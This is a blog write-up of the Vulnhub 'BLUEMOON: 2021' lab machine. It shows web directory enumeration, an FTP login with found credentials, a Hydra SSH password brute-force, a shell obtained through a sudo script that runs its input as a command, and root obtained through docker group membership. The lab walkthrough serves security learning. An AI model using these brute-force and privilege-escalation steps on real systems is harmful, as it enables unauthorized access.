---
layout: post
title:  "Vulnhub: BLUEMOON: 2021"
date:   2021-04-18 19:00:00 +1100
category: hacking
---

## BLUEMOON: 2021
This is [BLUEMOON: 2021](https://www.vulnhub.com/entry/bluemoon-2021,679/) from Vulnhub. It is easy rated and I picked it to do because someone on the Vulnhub discord was looking for a write-up, which made me think maybe it was challenging. After that - and before I got a chance to do it myself - someone else posted a writeup, but I didn't read it. Nevertheless, this is going to be super short, because it was pretty simple. Let's go.

## Ports
FTP, SSH and HTTP. No anon on the FTP.

## Web
It needs some heavy enumeration to find what we want:

{% highlight shell %}
â”€â”€(rootðŸ’€kali)-[/opt/vulnhub/bluemoon]
â””â”€# feroxbuster -u http://192.168.1.203 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -C 403

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher ðŸ¤“                 ver: 2.2.1
â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”¬â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
 ðŸŽ¯  Target Url            â”‚ http://192.168.1.203
 ðŸš€  Threads               â”‚ 50
 ðŸ“–  Wordlist              â”‚ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
 ðŸ‘Œ  Status Codes          â”‚ [200, 204, 301, 302, 307, 308, 401, 403, 405]
 ðŸ’¢  Status Code Filters   â”‚ [403]
 ðŸ’¥  Timeout (secs)        â”‚ 7
 ðŸ¦¡  User-Agent            â”‚ feroxbuster/2.2.1
 ðŸ’‰  Config File           â”‚ /etc/feroxbuster/ferox-config.toml
 ðŸ”ƒ  Recursion Depth       â”‚ 4
 ðŸŽ‰  New Version Available â”‚ https://github.com/epi052/feroxbuster/releases/latest
â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”´â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
 ðŸ  Press [ENTER] to use the Scan Cancel Menuâ„¢
â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€â”€
200       45l      109w     1169c http://192.168.1.203/hidden_text
[####################] - 4m   1273785/1273785 0s      found:1       errors:1219   
[####################] - 4m   1273785/1273785 4912/s  http://192.168.1.203
{% endhighlight %}

Once we have it, we get a link to a QR code which contains FTP credentials.

## FTP
When we login to FTP we get this:

{% highlight shell %}
â”Œâ”€â”€(rootðŸ’€kali)-[/opt/vulnhub/bluemoon]
â””â”€# ftp 192.168.1.203                                                                                                                                      130 â¨¯
Connected to 192.168.1.203.
220 (vsFTPd 3.0.3)
Name (192.168.1.203:root): userftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lash
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        0            4096 Mar 08 00:28 .
drwxr-xr-x    3 1001     1001         4096 Mar 08 00:24 ..
-rw-r--r--    1 0        0             147 Mar 08 00:27 information.txt
-rw-r--r--    1 0        0             363 Mar 08 00:28 p_lists.txt
{% endhighlight %}

And that contains a username (in the 'information.txt') and a list of passwords. Hydra makes short work of it.

{% highlight shell %}
â”€â”€(rootðŸ’€kali)-[/opt/vulnhub/bluemoon]
â””â”€# hydra -l robin -P ./p_lists.txt ssh://192.168.1.203
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-18 05:23:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 32 login tries (l:1/p:32), ~2 tries per task
[DATA] attacking ssh://192.168.1.203:22/
[22][ssh] host: 192.168.1.203   login: robin   password: k4rv3ndh4nh4ck3r
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-18 05:23:32
{% endhighlight %}

And we can SSH in. 

## Robin
Robin can do this:

{% highlight shell %}
robin@BlueMoon:~/project$ sudo -l
Matching Defaults entries for robin on bluemoon:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User robin may run the following commands on bluemoon:
    (jerry) NOPASSWD: /home/robin/project/feedback.sh
{% endhighlight %}

Which is:

{% highlight shell %}
robin@BlueMoon:~/project$ cat feedback.sh 
#!/bin/bash

clear
echo -e "Script For FeedBack\n"

read -p "Enter Your Name : " name
echo ""
read -p "Enter You FeedBack About This Target Machine : " feedback
echo ""
$feedback 2>/dev/null

echo -e "\nThanks For Your FeedBack...!\n"
{% endhighlight %}

In case it's not obvious, whatever is entered on the second read will be executed. I use *sh* to get a shell as Jerry and then upgrade it with python.

## Jerry > root
Jerry is in the docker group:

{% highlight shell %}
id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry),114(docker)
docker run -it -v /:/mnt alpine chroot /mnt
root@a93f401a9aa9:/# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
root@a93f401a9aa9:/# id;date;hostname
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
Sun Apr 18 01:40:42 PDT 2021
a93f401a9aa9
root@a93f401a9aa9:/#
{% endhighlight %}

So that was that, see ya.
